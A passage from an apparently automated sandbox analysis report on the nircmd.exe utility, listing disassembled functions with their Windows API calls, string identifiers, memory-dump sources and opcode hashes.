                                                                                                                                                          • Opcode Fuzzy Hash: 39ed4dc4af701b95e17890d0ccf9f1c7d390ea2c3c5e81c01c3f80905f10cf9e
                                                                                                                                                          • Instruction Fuzzy Hash: 43319FB6601B81A1EB528F26E8847D823B1F789B98F484125EF4D5B3B8DF39C595C324
                                                                                                                                                          Function 0000000140012D2C Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 46libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012D43
                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012D53
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012D6B
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012D7F
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012D93
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012DA7
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012DBB
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,00000000,0000000140012E17,?,?,?,?,?,00000000,0000000140011BD2), ref: 0000000140012DCF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                          • String ID: RasDialA$RasEnumConnectionsA$RasGetConnectStatusA$RasGetEntryDialParamsA$RasHangUpA$RasSetEntryDialParamsA$rasapi32.dll
                                                                                                                                                          • API String ID: 2449869053-1206557285
                                                                                                                                                          • Opcode ID: db0cd2b268db60ed2656f3baa68e978ed43c09517179c9b31d1c66964b6447fd
                                                                                                                                                          • Instruction ID: 11c99d5bd60d13d2488c53c5f2a8604cd3a8dadd4245bf85f2efcb641b15ca1a
                                                                                                                                                          • Opcode Fuzzy Hash: db0cd2b268db60ed2656f3baa68e978ed43c09517179c9b31d1c66964b6447fd
                                                                                                                                                          • Instruction Fuzzy Hash: 14216236202F42A2DB029F5AE68479833B5FB8DB90F459126EB5D4B724DF79C5B4C310
                                                                                                                                                          Function 00000001400017D4 Relevance: 24.2, APIs: 16, Instructions: 222fileclipboardcomCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$File$Writememset$ClipboardLockMediumReleaseSizeUnlock$??2@??3@CloseCreateFormatHandleName
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3751711975-0
                                                                                                                                                          • Opcode ID: 52fc984b71b7c5728990935a43b2ca37f2e2492a078f9284814b091e588d2386
                                                                                                                                                          • Instruction ID: ba9ec8fd1e8e063200e9de19a99185466af1d46886b2d076e588849b01c66b0e
                                                                                                                                                          • Opcode Fuzzy Hash: 52fc984b71b7c5728990935a43b2ca37f2e2492a078f9284814b091e588d2386
                                                                                                                                                          • Instruction Fuzzy Hash: 02A139B2218A8086DB61DF16F8507DAB7A5F7C8BD4F404516FB8A47AA8DF39C584CB00
                                                                                                                                                          Function 0000000140007314 Relevance: 24.1, APIs: 16, Instructions: 98timestringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: atoimemcpy$Time$File$LocalSystemmemsetstrlen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4117804085-0
                                                                                                                                                          • Opcode ID: da462725357e4bdfb1f588828954582d176e237319002a81bbbd95b006f56a6a
                                                                                                                                                          • Instruction ID: 8859f3b8b3655294da16c42703e2bc7dc1a8dd1bdbb34d9fc5876246e832f69e
                                                                                                                                                          • Opcode Fuzzy Hash: da462725357e4bdfb1f588828954582d176e237319002a81bbbd95b006f56a6a
                                                                                                                                                          • Instruction Fuzzy Hash: 4141967620D780D5EB22EB62E0807DEA761F7897C5F404011FB8D0BAAADB3DC249CB01
                                                                                                                                                          Function 0000000140003D78 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 147stringcomCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcpy$strlen$ByteCharCreateInstanceMultiWidememsetstrcatstrchrstrrchr
                                                                                                                                                          • String ID: .lnk$<>:"/\|
                                                                                                                                                          • API String ID: 2318563685-1888144795
                                                                                                                                                          • Opcode ID: 970936776725169fdba244dcfad54597f546e7c50d3649a837125981b00b2ab1
                                                                                                                                                          • Instruction ID: dc9d8ef004ac800ac9cdda0b991b08ab259dff8921d9ab1a1eb53d3560bc22b0
                                                                                                                                                          • Opcode Fuzzy Hash: 970936776725169fdba244dcfad54597f546e7c50d3649a837125981b00b2ab1
                                                                                                                                                          • Instruction Fuzzy Hash: BD71F976308BC5C5EB22DB16E4847DEA765F788B85F444112EB8D4BBA9DF39C509CB00
                                                                                                                                                          Function 00000001400030E8 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                          • String ID: cancel$close$help$ignore$retry$yes
                                                                                                                                                          • API String ID: 2884411883-4066124357
                                                                                                                                                          • Opcode ID: 3c9c970f448a4c580d13b02920847eadcac2473460b08e1e3c12ac12947557f3
                                                                                                                                                          • Instruction ID: 2ec3a52d834c5b523d035b26f6665a95e31256c2fd588c5abc4ebeb21de43a22
                                                                                                                                                          • Opcode Fuzzy Hash: 3c9c970f448a4c580d13b02920847eadcac2473460b08e1e3c12ac12947557f3
                                                                                                                                                          • Instruction Fuzzy Hash: 7921F6B4354702C5FA27EA27BC413E9535A5B4D3C5F486021BF068F2F6FA7AC5818301
                                                                                                                                                          Function 0000000140012040 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 51libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 000000014001205A
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 0000000140012076
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 0000000140012096
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 00000001400120B2
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 00000001400120CE
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 00000001400120EA
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,0000000140012140,?,?,?,?,00000001400084AB), ref: 000000014001211D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                          • Opcode ID: 08c3d4e552a6442ad28176371f79392d4ee4015d9993019f13f3d784adb150e1
                                                                                                                                                          • Instruction ID: 6dd8e4817c81e0b4b3fc763721bd7f8e6ff1ef5ec4283412c3ba56c12f54b96f
                                                                                                                                                          • Opcode Fuzzy Hash: 08c3d4e552a6442ad28176371f79392d4ee4015d9993019f13f3d784adb150e1
                                                                                                                                                          • Instruction Fuzzy Hash: 6A21C370612B01A6FE4BDB17B8507A033F0AB5DBC1F485129AB0E0B370EF7E94658310
                                                                                                                                                          Function 0000000140011F54 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 51libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011F6E
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011F8A
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011FAA
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011FC6
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011FE2
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140011FFE
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,0000000140012147,?,?,?,?,00000001400084AB), ref: 0000000140012031
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                          • API String ID: 2449869053-3953557276
                                                                                                                                                          • Opcode ID: 63b30c4b29be939eddd5fa9c3c8d9650fc8e3124ff7eda80945b079c07d3fd97
                                                                                                                                                          • Instruction ID: 068a0fc88150a5e520bd93caf9b34e123a9050d06f53a34bc43eac8b13776a9e
                                                                                                                                                          • Opcode Fuzzy Hash: 63b30c4b29be939eddd5fa9c3c8d9650fc8e3124ff7eda80945b079c07d3fd97
                                                                                                                                                          • Instruction Fuzzy Hash: CC217070202B4196FA5B9B17BC547E433F1AB4DBC1F49512AAA1E4B3B1EF3E9598C310
                                                                                                                                                          Function 000000014000A88C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$_stricmp$ForegroundProcessThread$ByteCharChildEnumInitializeMultiWideWindows_wcsicmp
                                                                                                                                                          • String ID: focused$systemsounds
                                                                                                                                                          • API String ID: 520266979-605464368
                                                                                                                                                          • Opcode ID: 79da06a4b4acdd8b67ad27682052f22131775b6a05386a1bb1988e57c4f76c03
                                                                                                                                                          • Instruction ID: 7ac07959541befd2140301f2542d84aad1e62ab218efbd59ce577359199d4a62
                                                                                                                                                          • Opcode Fuzzy Hash: 79da06a4b4acdd8b67ad27682052f22131775b6a05386a1bb1988e57c4f76c03
                                                                                                                                                          • Instruction Fuzzy Hash: 055171727047418AEB26EF27A4417E977A1E78EBD0F045129BB494BAB5DF3DC446CB00
                                                                                                                                                          Function 0000000140013AE4 Relevance: 21.1, APIs: 1, Strings: 13, Instructions: 61stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcpy
                                                                                                                                                          • String ID: AppData$Common AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Cookies$Desktop$Favorites$Programs$Recent$Start Menu$Startup
                                                                                                                                                          • API String ID: 3177657795-3872221218
                                                                                                                                                          • Opcode ID: fb3b05fd8f3e7e8e7cdab919e7fed8784cbb5d3d79be58f416e30767c40063f9
                                                                                                                                                          • Instruction ID: f407cc9461aafd8cff545b46b6da7d72e1c59fa41a6d437e480483cba0a7b802
                                                                                                                                                          • Opcode Fuzzy Hash: fb3b05fd8f3e7e8e7cdab919e7fed8784cbb5d3d79be58f416e30767c40063f9
                                                                                                                                                          • Instruction Fuzzy Hash: 0821AC7110C94090F56FD65FA9D83F42662A30E3D0FD55545F3960F9F9B77B8A45D200
                                                                                                                                                          Function 0000000140007C30 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                          • String ID: abovenormal$belownormal$high$low$normal$realtime
                                                                                                                                                          • API String ID: 2884411883-958970173
                                                                                                                                                          • Opcode ID: 205c3a8b825a7b08a50d46d63c1406253b0d3c4fa86846c2d3cafb8797588cd4
                                                                                                                                                          • Instruction ID: 69f8d428af4987c973896db4dca5526327e8e572890b225f15a067acc3d124e6
                                                                                                                                                          • Opcode Fuzzy Hash: 205c3a8b825a7b08a50d46d63c1406253b0d3c4fa86846c2d3cafb8797588cd4
                                                                                                                                                          • Instruction Fuzzy Hash: 2A11E9F0A4460181FA66EB27BD51BE403806B5C7C4F845036BB1A8F2FAEB7DCA448205
                                                                                                                                                          Function 0000000140012CA0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 31libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                          • API String ID: 2238633743-232097475
                                                                                                                                                          • Opcode ID: 187429d329e51a0871d1cf27a5b4e7f48010a5b821799f353fab7aa8adf98776
                                                                                                                                                          • Instruction ID: 45157a7d630c466e3f339c66ea7a43ff1e9be4e6c1c89c1e5a6917cf516666a6
                                                                                                                                                          • Opcode Fuzzy Hash: 187429d329e51a0871d1cf27a5b4e7f48010a5b821799f353fab7aa8adf98776
                                                                                                                                                          • Instruction Fuzzy Hash: A4019C75601F4691EF029F66E89479833B0F34DB98F548112EA4D4B328EF3EC19AC350
                                                                                                                                                          Function 0000000140008C34 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91librarystringloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProcmemset$atoistrcpystrlen
                                                                                                                                                          • String ID: EnumDisplayDevicesA$user32.dll
                                                                                                                                                          • API String ID: 3558546962-2278183399
                                                                                                                                                          • Opcode ID: 27301c20c4a326926dbc67597fd074562cfa7db69c07c2fdc03de70701ebc424
                                                                                                                                                          • Instruction ID: c007393e9a47959c9e835e62f6632699182b835304fb94e62f7903005cb7ab1a
                                                                                                                                                          • Opcode Fuzzy Hash: 27301c20c4a326926dbc67597fd074562cfa7db69c07c2fdc03de70701ebc424
                                                                                                                                                          • Instruction Fuzzy Hash: B4314BB1305A4191FB76DB23B4543E963A1BBADBC0F898126EF894B7A5EF39C5058700
                                                                                                                                                          Function 000000014001361C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72threadsleepprocessCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ThreadWindow$AttachInput$CurrentEnumExecFocusForegroundLongProcessShowSleepWindows
                                                                                                                                                          • String ID: regedit.exe
                                                                                                                                                          • API String ID: 2889832356-3532722396
                                                                                                                                                          • Opcode ID: a8c7b487623788c5d5957a3c1955224fcbb065a88b790003cc9d10c7ad9476ab
                                                                                                                                                          • Instruction ID: f2473d1409a2d085da8ca3a64ab409af838f0e11408c1aae5d1de9060d6e16e5
                                                                                                                                                          • Opcode Fuzzy Hash: a8c7b487623788c5d5957a3c1955224fcbb065a88b790003cc9d10c7ad9476ab
                                                                                                                                                          • Instruction Fuzzy Hash: 31216D31310A0082EB169B27E8547A97762B78DFD4F588621FF9A4B7B9DE3AC8458341
                                                                                                                                                          Function 000000014000507C Relevance: 18.3, APIs: 12, Instructions: 264memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocTask$memset$memcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269781005-0
                                                                                                                                                          • Opcode ID: a92108033b8d1965a406843748201e11bc42ecb644dde5c2e9d009a5ae110bfb
                                                                                                                                                          • Instruction ID: 2ff9e0a7e489f98ce698c5f68fa80e85f7318122615fc2e3cb6eb470a382c795
                                                                                                                                                          • Opcode Fuzzy Hash: a92108033b8d1965a406843748201e11bc42ecb644dde5c2e9d009a5ae110bfb
                                                                                                                                                          • Instruction Fuzzy Hash: 4EB1B5B2210690C6E71ADF16E448BDE33B4FB0A7C9F409429F74A4B3A1EBB9D584C705
                                                                                                                                                          Function 000000014000A180 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$AttributesFileInitializeUninitializeatoimemcpymemsetstrlen
                                                                                                                                                          • String ID: Failed to create the shortcut !$max$min
                                                                                                                                                          • API String ID: 1265206195-175149443
                                                                                                                                                          • Opcode ID: 4f3f6d7e295ec2548f870704ffd647eb11e60efd421fbdc7e0d3f904b587a476
                                                                                                                                                          • Instruction ID: 1051ef9a8fb9c71374609eb59e55176655e80325a88a02efb72a3799e696616d
                                                                                                                                                          • Opcode Fuzzy Hash: 4f3f6d7e295ec2548f870704ffd647eb11e60efd421fbdc7e0d3f904b587a476
                                                                                                                                                          • Instruction Fuzzy Hash: CF51E3B270868086EF12DB22F5917E9B391FB497C4F058122FB564B6A9EF7DC608C700
                                                                                                                                                          Function 0000000140002E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
